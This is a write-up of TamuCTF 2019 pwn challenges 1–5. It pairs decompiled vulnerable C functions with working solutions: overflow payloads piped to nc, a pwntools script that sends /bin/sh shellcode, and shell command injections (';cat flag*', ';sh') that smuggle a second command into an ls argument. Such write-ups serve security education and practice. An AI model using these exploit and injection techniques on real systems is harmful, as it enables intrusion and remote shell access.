TamuCTF 2019 - Pwn 1,2,3,4,5
Pwn 1
Trivial strcmp comparisons and one tiny buffer overflow in order to set a value. No explications needed.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1h] [ebp-3Bh]
int v5; // [esp+2Ch] [ebp-10h]
int v6; // [esp+30h] [ebp-Ch]
int *v7; // [esp+34h] [ebp-8h]
v7 = &argc;
setvbuf(stdout, (char *)&dword_0 + 2, 0, 0);
v6 = 2;
v5 = 0;
puts("Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.");
puts("What... is your name?");
fgets(&s, 43, stdin);
if ( strcmp(&s, "Sir Lancelot of Camelot\n") )
{
puts("I don't know that! Auuuuuuuugh!");
exit(0);
}
puts("What... is your quest?");
fgets(&s, 43, stdin);
if ( strcmp(&s, "To seek the Holy Grail.\n") )
{
puts("I don't know that! Auuuuuuuugh!");
exit(0);
}
puts("What... is my secret?");
gets(&s);
if ( v5 == 0xDEA110C8 )
print_flag();
else
puts("I don't know that! Auuuuuuuugh!");
return 0;
}
switch :: pain $ python -c 'print "Sir Lancelot of Camelot\nTo seek the Holy Grail.\n" + "A" * 43 + "\xde\xa1\x10\xc8"[::-1] + "\n"' | nc pwn.tamuctf.com 4321
Pwn 2
This binary had PIE activated so the addresses of functions will be randomized at each run, without leak we can't call them. This chall was a off by one buffer overflow, it means we can only rewrite the last byte of a called function.
int __cdecl select_func(char *src)
{
char dest; // [esp+Eh] [ebp-2Ah]
int (*v3)(void); // [esp+2Ch] [ebp-Ch]
v3 = (int (*)(void))two;
strncpy(&dest, src, 31u);
if ( !strcmp(&dest, "one") )
v3 = (int (*)(void))one;
return v3();
}
Because of PIE and without leak we can't get print_flag address but the last byte is always the same !
So we juste have to rewrite the last byte of the called function with the one of print_flag which is : 0xd8. It will call print_flag function instead of the excepted one.
switch :: pain $ python -c 'print "A" * 30 + "\xd8" + "\n"' | nc pwn.tamuctf.com 4322
Pwn 3
It was a trivial buffer overflow where the address of the buffer is kindly given. You just have to locate saved eip, replace it with the address of the buffer and place a shellcode in it !
char *echo()
{
char s; // [esp+Eh] [ebp-12Ah]
printf("Take this, you might need it on your journey %p!\n", &s);
return gets(&s);
}
from pwn import *
s = remote("pwn.tamuctf.com", 4323)
sc = asm(shellcraft.i386.linux.sh())
s.sendline(sc + "A" * (302 - len(sc)) + p32(int(s.readuntil("!")[-11:-1],16)))
s.interactive()
#gigem{r3m073_fl46_3x3cu710n}
Pwn 4
This chall was not about memory vulnerabilities but commands injection. There is no filtesr so you can do as you want ..
int __cdecl run_cmd(int a1)
{
char s; // [esp+2h] [ebp-26h]
snprintf(&s, 27u, "ls %s", a1);
printf("Result of %s:\n", &s);
return system(&s);
}
switch :: pain ~ $ echo "; cat flag*" |nc pwn.tamuctf.com 4324
ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
Result of ls ; cat flag*:
flag.txt
pwn4
gigem{5y573m_0v3rfl0w}
Pwn 5
Exactly as Pwn 4 but with length restriction by 3 chars only so we could juste use sh which is a symbolic link to bash :
switch :: pain ~ $ (echo ";sh"; cat) | nc pwn.tamuctf.com 4325
ls as a service (laas)(Copyright pending)
Version 2: Less secret strings and more portable!
Enter the arguments you would like to pass to ls:
Result of ls ;sh:
flag.txt
pwn5
cat flag.txt
gigem{r37urn_0r13n73d_pr4c71c3}
Pwn 6
Sadly I didn't have the time to do it :((